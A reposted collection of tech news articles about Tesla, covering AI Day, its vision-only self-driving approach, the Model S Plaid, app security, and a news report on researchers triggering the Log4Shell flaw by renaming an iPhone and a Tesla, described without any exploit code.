Categories
AI

Tesla AI Day event: start time and how to watch the live stream

Today is Tesla’s AI Day, a sequel of sorts to the company’s Autonomy Day event held in 2019. The event, which will be held at Tesla’s headquarters in Palo Alto, CA, will be livestreamed for the public starting at 5PM PT / 8PM ET (though the event may not actually begin until closer to 5:30PM PT).

We don’t have a lot of details about what will be announced, but based on the invitation, we’ll get a keynote address by Tesla CEO Elon Musk, hardware and software demos from Tesla engineers, test rides in the Model S Plaid, and “more.” Musk has also tweeted that the “sole goal” of the event is to lure experts in the field of robotics and artificial intelligence to come work at Tesla.

Tesla usually holds around two public events a year. This year, we got the Tesla Model S Plaid launch event in June, and now AI Day. Over the past few years, Tesla has been holding events, not to unveil new products, but to highlight certain technologies that the company views as crucial to its future development. Last year, Tesla held its first Battery Day event, at which it discussed plans to drive down the cost of battery development with the goal of producing a $25,000 electric car.

AI Day is expected to pick up on the themes first introduced during Autonomy Day, which include the manufacturing of Tesla’s own silicon computer chips to power it’s Full Self-Driving advanced driver assistance feature.

This AI Day comes at an awkward time for the company. Earlier this week, the National Highway Traffic Safety Administration announced that it was investigating Tesla’s Autopilot for the nearly dozen incidents in which its cars crashed into emergency vehicles. Two Democratic senators also called on the Federal Trade Commission to investigate Tesla’s marketing practices for potentially misleading information.

Repost: Original Source and Author Link

Categories
AI

Tesla AI Day: what to expect from Elon Musk’s latest big announcement

It’s been nearly two years since Tesla’s first “Autonomy Day” event, at which CEO Elon Musk made numerous lofty predictions about the future of autonomous vehicles, including his infamous claim that the company would have “one million robotaxis on the road” by the end of 2020. And now it’s time for Part Deux.

This time, the event will be called “AI Day,” and according to Musk, the “sole goal” is to persuade experts in the field of robotics and artificial intelligence to come work at Tesla. The company is known for its high rate of turnover, the latest being Jerome Guillen, a key executive who worked at Tesla for 10 years before recently stepping down. Attracting and retaining talent, especially top tier names, has proven to be a challenge for the company.

The August 19th event is scheduled to start at 5PM PT / 8PM ET at Tesla’s headquarters in Palo Alto, California. According to an invitation obtained by Electrek, it will feature “a keynote by Elon, hardware and software demos from Tesla engineers, test rides in Model S Plaid, and more.” Much like Battery Day, the event will be livestreamed on Tesla’s website, giving investors and the media, as well as the company’s many fans, an up-close look at what’s under development.

Musk and other top officials at the company are expected to provide updates on the rollout of Tesla’s “Full Self-Driving” (FSD) beta version 9, which started reaching more customers this summer. We may also get details about Tesla’s “Dojo” supercomputer, the training of its neural network, and the production of its FSD computer chips. And there will also be “an inside look at what’s next for AI at Tesla beyond our vehicle fleet,” the invitation says.

Let’s start with what we know and work our way toward the speculation of what’s to come.

Tesla Gigafactory - Elon Musk

Photo by Patrick Pleul / picture alliance via Getty Images

FSD rollout

The big news out of Tesla’s first Autonomy Day was the introduction of the company’s first computer chip, a 260 square millimeter piece of silicon that Musk described as “the best chip in the world.” Originally, Musk had claimed that Tesla’s cars wouldn’t need any hardware updates, only software, on the road to full autonomy. Turns out that wasn’t exactly the case; they would need this new chip — two of them, actually — in order to eventually drive themselves.

A lot has happened between the 2019 event and now. Last month, Tesla began shipping over-the-air software updates for FSD beta v9, its long-awaited, definitely not autonomous, but certainly advanced driver assist system. That means that Tesla owners who have purchased the FSD option (which now costs $10,000) would finally be able to use many of Autopilot’s advanced driver-assist features on local, non-highway streets, including Navigate on Autopilot, Auto Lane Change, AutoPark, Summon, and Traffic Light and Stop Control.

The update doesn’t make Tesla’s cars fully autonomous, nor will it launch “a million self-driving cars” on the road, as Musk predicted. Tesla owners who have Full Self-Driving still need to pay attention to the road and keep their hands on the steering wheel. Some don’t, which can have tragic consequences.

Loved by fans, loathed by safety advocates, the FSD software has gotten Tesla in a lot of hot water recently. In recently publicized emails between Tesla and California’s Department of Motor Vehicles, the company’s director of Autopilot software made it clear that Musk’s comments (including his tweets) do not reflect the reality of what Tesla’s vehicles can actually do. And now Autopilot is under investigation by federal regulators who want to know why Teslas with Autopilot keep crashing into emergency vehicles.

Aside from the rollout of FSD beta v9, Tesla has also had to adjust to the global chip shortage. In a recent earnings call, Musk said that the company’s engineers had to rewrite some of their software in order to accommodate alternate computer chips. He also said that Tesla’s future growth will depend on a swift resolution to the global semiconductor shortage.

Tesla relies on chips to power everything from its airbags to the modules that control the vehicles’ seatbelts. It’s not clear whether the FSD chips, which are produced by Samsung, are being impacted by the shortage. Musk and his cohort may provide some insight into that during this week’s event.

Credit: Tesla

Dojo

Outside the car, Tesla uses a powerful supercomputer to train the AI software that then gets fed to its customers via over-the-air software updates. In 2019, Musk teased this “super powerful training computer,” which he referred to as “Dojo.”

“Tesla is developing a [neural net] training computer called Dojo to process truly vast amounts of video data,” he later tweeted. “It’s a beast!”

He also hinted at Dojo’s computing power, claiming it was capable of an exaFLOP, or one quintillion (​​1018) floating-point operations per second. That is an incredible amount of power. “To match what a one exaFLOP computer system can do in just one second,” NetworkWorld wrote last year, “you’d have to perform one calculation every second for 31,688,765,000 years.”

By way of comparison, chipmaker AMD and computer builder Cray are currently working with the US Department of Energy on the design of the world’s fastest supercomputer, with 1.5 exaFLOPs of processing power. Dubbed Frontier, AMD says the supercomputer will have as much processing power as the next 160 fastest supercomputers combined.

When completed, Dojo is expected to be among the most powerful supercomputers on the planet. But rather than performing advanced calculations in areas like nuclear and climate research, Tesla’s supercomputer is running a neural net for the purposes of training its AI software to power self-driving cars. Ultimately, Musk has said Tesla will make Dojo available to other companies that want to use it to train their neural networks.

Earlier this year, Andrej Karpathy, Tesla’s head of AI, gave a presentation at the 2021 Conference on Computer Vision and Pattern Recognition, during which he offered more details about Dojo and its neural network.

“For us, computer vision is the bread and butter of what we do and what enables Autopilot,” Karpathy said, according to Electrek. “And for that to work really well, we need to master the data from the fleet, and train massive neural nets and experiment a lot. So we invested a lot into the compute.”

Other robots?

Earlier this month, Dennis Hong, founder of the Robotics and Mechanisms Laboratory at UCLA, tweeted a photo of a computer chip that many speculate is the in-house hardware used by Tesla’s Dojo.

But Hong is an interesting figure for other reasons, too. He specializes in humanoid robots and was a participant in the DARPA Urban Challenge which kicked off the race for self-driving cars. (His team placed third.)

Asked on Twitter whether his lab was working with Tesla, Hong posted some playful emojis but otherwise declined comment. We may learn more about how Hong’s work and Tesla’s pursuits intersect during AI Day.

Musk has been forthcoming about his desires for Tesla to become more than just a car company. “I think long term, people will think of Tesla as much as an AI robotics company as we are a car company or an energy company,” he said earlier this year.

US-POLITICS-ECONOMY-INFRASTRUCTURE

Photo by Andrew Caballero-Reynolds / AFP via Getty Images

The future

A warning for anyone tuning in to the AI Day livestream: take Musk’s predictions about near-term accomplishments with a massive grain of salt. The things that will be discussed during this event are unlikely to have any measurable impact on the company’s business in the months to come.

Self-driving cars are an incredibly difficult challenge. Even companies like Waymo that are perceived to have the best autonomous vehicle technology are still struggling to get it right. Tesla is no different.

“A key question for investors will be what the latest timeline is for achieving full autonomy,” Loup Funds managing partner Gene Munster said in a note. “Despite Elon’s ambitious goal of the end of this year, our best guess is that 2025 will be the first year of public availability of level 4 autonomy.”

The rest of 2021 is already jam packed for Tesla. The company needs to open factories in Texas and Germany. And it needs to tool up production for its hotly anticipated Cybertruck, which has been delayed until 2022. Full autonomy, such as it is, can wait.



Repost: Original Source and Author Link

Categories
Security

Researchers trigger new exploit by renaming an iPhone and a Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell exploit claim to have used it on devices as varied as iPhones and Tesla cars. Per screenshots shared online, changing the device name of an iPhone or Tesla to a special exploit string was enough to trigger a ping from Apple or Tesla servers, indicating that the server at the other end was vulnerable to Log4Shell.

In the demonstrations, researchers switched the device names to be a string of characters that would send servers to a testing URL, exploiting the behavior enabled by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, China Unicom — the company’s mobile service partner for the Chinese market. In short, the researchers tricked Apple and Tesla servers into visiting a URL of their choice.

Apple device information screen showing name changed to log4shell attack string

An iPhone device information screen with name changed to contain the exploit string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface Github repository.

Assuming the images are genuine, they show behavior — remote resource loading — that should not be possible with text contained in a device name. This proof of concept has led to widespread reporting that Apple and Tesla are vulnerable to the exploit.

While the demonstration is alarming, it’s not clear how useful it would be for cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More broadly, there’s no indication that the method could lead to any broader compromise of Apple or Tesla’s systems. (Neither company responded to an email request for comment by time of publication.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j which is widely used for application event logging; though it’s still not known exactly how many devices are affected, but researchers estimate that it is in the millions, including obscure systems that are rarely targeted by attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a blog post, digital forensics platform Cado reported detecting servers trying to use this method to install Mirai botnet code.

Log4Shell is all the more serious for being relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and trying to retrieve that resource instead of saving the text as it is written. All that’s necessary is for a vulnerable device to save the special string of characters in its application logs.

This creates the potential for vulnerability in many systems that accept user input, since message text can be stored in the logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise using chat messages; and systems that send and receive other message formats like SMS clearly are also susceptible.

At least one major SMS provider appears to be vulnerable to the exploit, according to testing conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing exploit code triggered a response from the company’s servers that revealed information about the IP address and host name, suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at time of publication.

An update to the log4j library has been released to mitigate against the vulnerability, but patching of all vulnerable machines will take time given the challenges of updating enterprise software at scale.



Repost: Original Source and Author Link

Categories
Game

PUBG Mobile 1.5 update adds Tesla Gigafactory and Model Y

Tencent Games has pushed out update version 1.5 for its hit mobile game PUBG Mobile, giving players a variety of new content, not the least of which is a bigger Tesla collaboration. Under this partnership, PUBG Mobile is now home to a Tesla Gigafactory where players can not only explore the virtual version of the facility but also produce their own Model Y vehicle.

PUBG Mobile 1.5 represents a huge update for the title, which is a mobile game based on the PC title PlayerUnknown’s Battlegrounds. The most notable aspect of the update is the Tesla collaboration, which adds a Gigafactory to Erangel, the game’s most popular map. This is a functional factory, according to the company, one that can be accessed in the Mission Ignition game mode.

Players can activate all of the switches found in the Gigafactory to trigger the vehicle assembly process. The result will be an in-game Model Y SUV, which will include the company’s autopilot mode that players can turn on when driving on the map’s highways. The self-driving vehicle will take players to presets along the road.

In addition, mobile gamers will also notice other autonomous Tesla vehicles in random locations “along the road, in the wild,” according to Tencent. These randomly spawned vehicles will apparently drive themselves around on preset routes. The Tesla Semi will be one such vehicle, which players will be able to damage in order to trigger a Supply Crates drop.

The wider Mission Ignition mode, meanwhile, will give Erangel an overall tech-heavy update where half a dozen major regions will sprout new lifts, buildings, moving platforms, and similar things. HyperLines will enable players to rapidly move between cities on the island, assuming they take them the lines are active. For other times, players will be able to take the Air Conveyor system to move through the sky.

PUBG Mobile version 1.5 is rolling out to players now. You can find the full patch notes on the game’s official website here.

Repost: Original Source and Author Link

Categories
Game

‘PUBG Mobile’ update adds a self-driving Tesla Model Y

PUBG Mobile probably isn’t the first game you’d expect to have an electric vehicle tie-in, but it’s here all the same. Krafton and Tencent Games have rolled out a 1.5 update for the phone-focused shooter that includes a raft of not-so-subtle plugs for Tesla and its cars. Most notably, you can find a Model Y on Erangel that can drive itself when you activate an autopilot mode on the highway —not that far off from the real Autopilot mode.

You’ll also find a Gigafactory on Erangel where you can build the Model Y by activating switches, and self-driving Semi trucks roam around the map dropping supply crates when you damage the vehicles. No, despite the imagery, you can’t drive a Cybertruck or Roadster (not yet, at least).

The additions are part of a larger “technological transformation” for Erangel that includes an overhaul of the buildings and new equipment, including an anti-gravity motorcycle.

As is often the case, you shouldn’t expect these updates in regular PUBG — the battle royale brawler for consoles and PCs has a more realistic atmosphere. The PUBG Mobile update is really a not-so-subtle way for Tesla to advertise its EVs in countries where it doesn’t already have strong word-of-mouth working in its favor.

All products recommended by Engadget are selected by our editorial team, independent of our parent company. Some of our stories include affiliate links. If you buy something through one of these links, we may earn an affiliate commission.

Repost: Original Source and Author Link

Categories
AI

Tesla AI chief explains why self-driving cars don’t need lidar

Where does your enterprise stand on the AI adoption curve? Take our AI survey to find out.


What is the technology stack you need to create fully autonomous vehicles? Companies and researchers are divided on the answer to that question. Approaches to autonomous driving range from just cameras and computer vision to a combination of computer vision and advanced sensors.

Tesla has been a vocal champion for the pure vision-based approach to autonomous driving, and in this year’s Conference on Computer Vision and Pattern Recognition (CVPR), its chief AI scientist Andrej Karpathy explained why.

Speaking at CVPR 2021 Workshop on Autonomous Driving, Karpathy, who has been leading Tesla’s self-driving efforts in the past years, detailed how the company is developing deep learning systems that only need video input to make sense of the car’s surroundings. He also explained why Tesla is in the best position to make vision-based self-driving cars a reality.

A general computer vision system

Deep neural networks are one of the main components of the self-driving technology stack. Neural networks analyze on-car camera feeds for roads, signs, cars, obstacles, and people.

But deep learning can also make mistakes in detecting objects in images. This is why most self-driving car companies, including Alphabet subsidiary Waymo, use lidars, a device that creates 3D maps of the car’s surrounding by emitting laser beams in all directions. Lidars provided added information that can fill the gaps of the neural networks.

However, adding lidars to the self-driving stack comes with its own complications. “You have to pre-map the environment with the lidar, and then you have to create a high-definition map, and you have to insert all the lanes and how they connect and all the traffic lights,” Karpathy said. “And at test time, you are simply localizing to that map to drive around.”

It is extremely difficult to create a precise mapping of every location the self-driving car will be traveling. “It’s unscalable to collect, build, and maintain these high-definition lidar maps,” Karpathy said. “It would be extremely difficult to keep this infrastructure up to date.”

Tesla does not use lidars and high-definition maps in its self-driving stack. “Everything that happens, happens for the first time, in the car, based on the videos from the eight cameras that surround the car,” Karpathy said.

The self-driving technology must figure out where the lanes are, where the traffic lights are, what is their status, and which ones are relevant to the vehicle. And it must do all of this without having any predefined information about the roads it is navigating.

Karpathy acknowledged that vision-based autonomous driving is technically more difficult because it requires neural networks that function incredibly well based on the video feeds only. “But once you actually get it to work, it’s a general vision system, and can principally be deployed anywhere on earth,” he said.

With the general vision system, you will no longer need any complementary gear on your car. And Tesla is already moving in this direction, Karpathy says. Previously, the company’s cars used a combination of radar and cameras for self-driving. But it has recently started shipping cars without radars.

“We deleted the radar and are driving on vision alone in these cars,” Karpathy said, adding that the reason is that Tesla’s deep learning system has reached the point where it is a hundred times better than the radar, and now the radar is starting to hold things back and is “starting to contribute noise.”

Supervised learning

The main argument against the pure computer vision approach is that there is uncertainty on whether neural networks can do range-finding and depth estimation without help from lidar depth maps.

“Obviously humans drive around with vision, so our neural net is able to process visual input to understand the depth and velocity of objects around us,” Karpathy said. “But the big question is can the synthetic neural networks do the same. And I think the answer to us internally, in the last few months that we’ve worked on this, is an unequivocal yes.”

Tesla’s engineers wanted to create a deep learning system that could perform object detection along with depth, velocity, and acceleration. They decided to treat the challenge as a supervised learning problem, in which a neural network learns to detect objects and their associated properties after training on annotated data.

To train their deep learning architecture, the Tesla team needed a massive dataset of millions of videos, carefully annotated with the objects they contain and their properties. Creating datasets for self-driving cars is especially tricky, and the engineers must make sure to include a diverse set of road settings and edge cases that don’t happen very often.

“When you have a large, clean, diverse datasets, and you train a large neural network on it, what I’ve seen in practice is… success is guaranteed,” Karpathy said.

Auto-labeled dataset

With millions of camera-equipped cars sold across the world, Tesla is in a great position to collect the data required to train the car vision deep learning model. The Tesla self-driving team accumulated 1.5 petabytes of data consisting of one million 10-second videos and 6 billion objects annotated with bounding boxes, depth, and velocity.

But labeling such a dataset is a great challenge. One approach is to have it annotated manually through data-labeling companies or online platforms such as Amazon Turk. But this would require a massive manual effort, could cost a fortune, and become a very slow process.

Instead, the Tesla team used an auto-labeling technique that involves a combination of neural networks, radar data, and human reviews. Since the dataset is being annotated offline, the neural networks can run the videos back in forth, compare their predictions with the ground truth, and adjust their parameters. This contrasts with test-time inference, where everything happens in real-time and the deep learning models can’t make recourse.

Offline labeling also enabled the engineers to apply very powerful and compute-intensive object detection networks that can’t be deployed on cars and used in real-time, low-latency applications. And they used radar sensor data to further verify the neural network’s inferences. All of this improved the precision of the labeling network.

“If you’re offline, you have the benefit of hindsight, so you can do a much better job of calmly fusing [different sensor data],” Karpathy said. “And in addition, you can involve humans, and they can do cleaning, verification, editing, and so on.”

According to videos Karpathy showed at CVPR, the object detection network remains consistent through debris, dust, and snow clouds.

tesla object tracking auto-labeling

Above: Tesla’s neural networks can consistently detect objects in various visibility conditions.

Image Credit: Logitech

Karpathy did not say how much human effort was required to make the final corrections to the auto-labeling system. But human cognition played a key role in steering the auto-labeling system in the right direction.

While developing the dataset, the Tesla team found more than 200 triggers that indicated the object detection needed adjustments. These included problems such as inconsistency between detection results in different cameras or between the camera and the radar. They also identified scenarios that might need special care such as tunnel entry and exit and cars with objects on top.

It took four months to develop and master all these triggers. As the labeling network became better, it was deployed in “shadow mode,” which means it is installed in consumer vehicles and run silently without issuing commands to the car. The network’s output is compared to that of the legacy network, the radar, and the driver’s behavior.

The Tesla team went through seven iterations of data engineering. They started with an initial dataset on which they trained their neural network. They then deployed the deep learning in shadow mode on real cars and used the triggers to detect inconsistencies, errors, and special scenarios. The errors were then revised, corrected, and if necessary, new data was added to the dataset.

“We spin this loop over and over again until the network becomes incredibly good,” Karpathy said.

So, the architecture can better be described as a semi-auto labeling system with an ingenious division of labor, in which the neural networks do the repetitive work and humans take care of the high-level cognitive issues and corner cases.

Interestingly, when one of the attendees asked Karpathy whether the generation of the triggers could be automated, he said, “[Automating the trigger] is a very tricky scenario, because you can have general triggers, but they will not correctly represent the error modes. It would be very hard to, for example, automatically have a trigger that triggers for entering and exiting tunnels. That’s something semantic that you as a person have to intuit [emphasis mine] that this is a challenge… It’s not clear how that would work.”

Hierarchical deep learning architecture

Tesla neural network self-driving car

Tesla’s self-driving team needed a very efficient and well-designed neural network to make the most out of the high-quality dataset they had gathered.

The company created a hierarchical deep learning architecture composed of different neural networks that process information and feed their output to the next set of networks.

The deep learning model uses convolutional neural networks to extract features from the videos of eight cameras installed around the car and fuses them together using transformer networks. It then fuses them across time, which is important for tasks such as trajectory-prediction and to smooth out inference inconsistencies.

The spatial and temporal features are then fed into a branching structure of neural networks that Karpathy described as heads, trunks, and terminals.

“The reason you want this branching structure is because there’s a huge amount of outputs that you’re interested in, and you can’t afford to have a single neural network for every one of the outputs,” Karpathy said.

The hierarchical structure makes it possible to reuse components for different tasks and enable feature-sharing between the different inference pathways.

Another benefit of the modular architecture of the network is the possibility of distributed development. Tesla is currently employing a large team of machine learning engineers working on the self-driving neural network. Each of them works on a small component of the network and they plug in their results into the larger network.

“We have a team of roughly 20 people who are training neural networks full time. They’re all cooperating on a single neural network,” Karpathy said.

Vertical integration

In his presentation at CVPR, Karpathy shared some details about the supercomputer Tesla is using to train and finetune its deep learning models.

The compute cluster is composed of 80 nodes, each containing eight Nvidia A100 GPUs with 80 gigabytes of video memory, amounting to 5,760 GPUs and more than 450 terabytes of VRAM. The supercomputer also has 10 petabytes of NVME superfast storage and 640 tbps networking capacity to connect all the nodes and allow efficient distributed training of the neural networks.

Tesla also owns and builds the AI chips installed inside its cars. “These chips are specifically designed for the neural networks we want to run for [full self-driving] applications,” Karpathy said.

Tesla’s big advantage is its vertical integration. Tesla owns the entire self-driving car stack. It manufactures the car and the hardware for self-driving capabilities. It is in a unique position to collect a wide variety of telemetry and video data from the millions of cars it has sold. It also creates and trains its neural networks on its proprietary datasets, its special in-house compute clusters, and validates and finetunes the networks through shadow testing on its cars. And, of course, it has a very talented team of machine learning engineers, researchers, and hardware designers to put all the pieces together.

“You get to co-design and engineer at all the layers of that stack,” Karpathy said. “There’s no third party that is holding you back. You’re fully in charge of your own destiny, which I think is incredible.”

This vertical integration and repeating cycle of creating data, tuning machine learning models, and deploying them on many cars puts Tesla in a unique position to implement vision-only self-driving car capabilities. In his presentation, Karpathy showed several examples where the new neural network alone outmatched the legacy ML model that worked in combination with radar information.

And if the system continues to improve, as Karpathy says, Tesla might be on the track of making lidars obsolete. And I don’t see any other company being able to reproduce Tesla’s approach.

Open issues

But the question remains as to whether deep learning in its current state will be enough to overcome all the challenges of self-driving. Surely, object detection and velocity and range estimation play a big part in driving. But human vision also performs many other complex functions, which scientists call the “dark matter” of vision. Those are all important components in the conscious and subconscious analysis of visual input and navigation of different environments.

Deep learning models also struggle with making causal inference, which can be a huge barrier when the models face new situations they haven’t seen before. So, while Tesla has managed to create a very huge and diverse dataset, open roads are also very complex environments where new and unpredicted things can happen all the time.

The AI community is divided over whether you need to explicitly integrate causality and reasoning into deep neural networks or if you can overcome the causality barrier through “direct fit,” where a large and well-distributed dataset will be enough to reach general-purpose deep learning. Tesla’s vision-based self-driving team seems to favor the latter (though given their full control over the stack, they could always try new neural network architectures in the future). It will be interesting to how the technology fares against the test of time.

Ben Dickson is a software engineer and the founder of TechTalks, a blog that explores the ways technology is solving and creating problems.

This story originally appeared on Bdtechtalks.com. Copyright 2021

VentureBeat

VentureBeat’s mission is to be a digital town square for technical decision-makers to gain knowledge about transformative technology and transact.

Our site delivers essential information on data technologies and strategies to guide you as you lead your organizations. We invite you to become a member of our community, to access:

  • up-to-date information on the subjects of interest to you
  • our newsletters
  • gated thought-leader content and discounted access to our prized events, such as Transform 2021: Learn More
  • networking features, and more

Become a member



Repost: Original Source and Author Link

Categories
Security

Elon Musk Promises Tesla App Will Soon Get Improved Security

Tesla boss Elon Musk has said on a number of occasions that two-factor authentication is coming to the Tesla app, but car owners are still waiting.

Responding recently to a customer inquiry asking if it will ever land, Musk acknowledged that the absence of the security measure is somewhat surprising for a company of Tesla’s status.

The CEO apologized for the delay, saying the feature was “embarrassingly late,” adding, “Two-factor authentication via SMS or authentication app is going through final validation right now.”

For those not in the know, two-factor authentication, as the description suggests, is a security feature that requires someone to input two forms of identification to access a smartphone app or some other online service. In most cases, when logging in, you’ll first enter your password, after which the service you’re trying to access will send a one-time code to your phone to enter as the second part of the log-in process. Alternatively, you might be asked to use an authenticator app, which serves up a one-time code to enable you to complete the log-in process.

The Tesla app allows owners to lock or unlock their vehicle from a distance, control the air conditioning before climbing in, flash lights and honk the horn when parked (for locating it), and vent/close the panoramic roof, among other things.

With the app an integral part of the Tesla experience, it would certainly give customers peace of mind if they knew that it had another layer of security attached.

Musk’s personal acknowledgement of the absence of two-factor authentication, and revelation that it’s in the final stages of development, suggests that its arrival is imminent.

These days, most online services that involve a login process offer the customer a chance to set up two-factor authentication for improved security. If you haven’t already done so, it’ll be worth diving into the security settings for any service that you use and taking a few minutes to set it up.

Editors’ Choice






Repost: Original Source and Author Link

Categories
Tech News

Tesla Delivers New Model S Plaid Car to First Customers

Tesla held its Model S Plaid delivery event on Thursday, June 10.

The livestreamed gathering took place at Tesla’s manufacturing facility in Fremont, California.

Tesla CEO Elon Musk arrived on stage in typically modest fashion — by hurtling around the Fremont test track at 100-plus mph in the new all-electric Plaid. Speaking to a small but enthusiastic crowd, Musk then spent 25 minutes running through the car’s plethora of features, some of them shown below.

Tesla

The tri-motor, 1020-horsepower Model S Plaid sits at the top of the Model S range and comes with a serious boost to its performance specs, including a top speed of 200 mph and an astonishingly zippy 0-to-60 time of just 1.99 seconds. In a tweet earlier this week, Musk described the Model S Plaid as the “quickest production car ever made of any kind,” adding, “Has to be felt to be believed.”

The vehicle’s estimated range of 390 miles is the second best among all of Tesla’s electric cars, with only the Model S Long Range able to go further — 412 miles — on a single charge. Tesla had been expected to launch a Plaid+ model, too, featuring additional range, but Musk recently announced that the company had canceled the plan, claiming there was “no need” for it “as Plaid is just so good.” We’ll wait for customer feedback on that one.

The first deliveries of the Model S Plaid come nine months after Tesla started taking orders for the new vehicle, which, at just a shade over $130,000, is the company’s most expensive production vehicle to date. Musk told the crowd the automaker is ready to deliver the first 25 Model S Plaid cars now, increasing to several hundred vehicles a week “soon,” and thousands a week “probably in the next quarter.”

Musk added that the arrival of the Model S variant marked “something that’s quite important about the future of sustainable energy, which is that we have to show that an electric car is the best car, hands down.”

Editors’ Choice




Repost: Original Source and Author Link

Categories
Tech News

Tesla May Be About to Enter the Restaurant Business

He’s sent rockets to space (and landed them again), given the EV market a much-needed boost, and launched a transportation project for ultra-high-speed travel. Now Elon Musk wants to open a diner.

Say what? A diner? Well, yes, at least according to a recent filing by Tesla for three new trademarks geared toward various restaurant services.

Specifically, Tesla’s filing with the United States Patent and Trademark Office (USPTO) refers to “restaurant services, pop-up restaurant services, self-service restaurant services, take-out restaurant services.”

According to Electrek, which first spotted the filing, the sought-after restaurant-related trademarks include one for the word “Tesla,” another for its “T” logo, and another for the company’s own specific design of the word “Tesla.”

OK, perhaps it’s not such a great surprise that Musk appears to be looking toward the restaurant industry for his next ambitious project. Or at least, his next project.

After all, three years ago, the billionaire entrepreneur tweeted about his desire to include an eatery of sorts at Tesla Supercharger stations in Los Angeles.

“Gonna put an old school drive-in, roller skates & rock restaurant at one of the new Tesla Supercharger locations in LA,” Musk said in the tweet.

Gonna put an old school drive-in, roller skates & rock restaurant at one of the new Tesla Supercharger locations in LA

— Elon Musk (@elonmusk) January 7, 2018

He hasn’t followed up on these ideas yet, but the recent filing with the USPTO certainly suggests that the electric car company is moving toward including Tesla-branded restaurants at some of its Supercharger stations.

Such facilities may already sell drinks in a cafe setting and also include a lounge with vending machines where you can relax while you wait for your vehicle to charge, but at the current time, you have to explore nearby amenities if you’re after a proper dining experience.

While there’s been no official word from Tesla on its apparent desire to move into the restaurant business, the recent filing suggests the company has put the plan on the menu and so could launch such a facility in the near future. Musk Mega Burger, anyone?

Editors’ Choice




Repost: Original Source and Author Link

Categories
Tech News

Tesla ditches feature many owners didn’t even know they had

Tesla boss Elon Musk said this week that the automaker ditched the lumbar support feature on the front passenger seat of the Model S and Model Y because vehicle logs revealed that it was hardly used.

“Logs showed almost no usage,” Musk tweeted in response to a follower who was complaining about Tesla’s recent price hikes, adding, “Not worth cost/mass for everyone when almost never used.”

However, even the briefest of online searches uncover plenty of comments that indicate the feature, which is designed to improve comfort via subtle seat adjustments, was rarely used because few people knew about it.

The person behind the Drive Tesla Twitter account, for example, admitted last year that it took a while to realize what the button on the side of the seat was actually for.

I’m not ashamed to admit I only discovered this week that this is the lumbar support. What feature did you only discover weeks or months after owning your #Tesla? pic.twitter.com/pA0aZKiW8g

— Drive Tesla ???????? (@DriveTeslaca) February 27, 2020

In a Tesla forum, another driver wrote: “LOL I have had my TM3 almost 5 months and until I found this thread I didn’t know I had lumbar adjustments.”

On a separate Tesla-focused site, an owner said simply: “We have lumbar buttons?!?”

Some posts about the feature suggest people may have stopped using it after finding that it provided little improvement to comfort. Other drivers, meanwhile, complained that it was hard to operate, with one poster saying they found the controls “finicky,” adding that they “don’t always seem to be working.”

Offering a succinct summary of the situation, a commenter on a YouTube video about the feature’s removal wrote: “Amazing how many people are losing their sh*t over something that they’ve got to go out to their car to see if they even have it or not!”

Responding to Musk’s tweet about the removal of lumbar support from the Model 3 and Model Y vehicles, some Tesla owners had an alternative suggestion about why it’s hardly used, explaining that once you’ve set it to your liking, there’s rarely a need to adjust it — though it’s worth noting that the driver’s seat is keeping the feature.

Of course, features in the passenger seat will always be used less than those on the driver’s side because the seat is occupied less frequently, though it’s not clear if Tesla took this into consideration. Whatever the truth about precisely why passengers skipped using lumbar support, Tesla has decided to remove it anyway, leaving riders to use the regular seat buttons to adjust the seat to their liking.

Editors’ Choice




Repost: Original Source and Author Link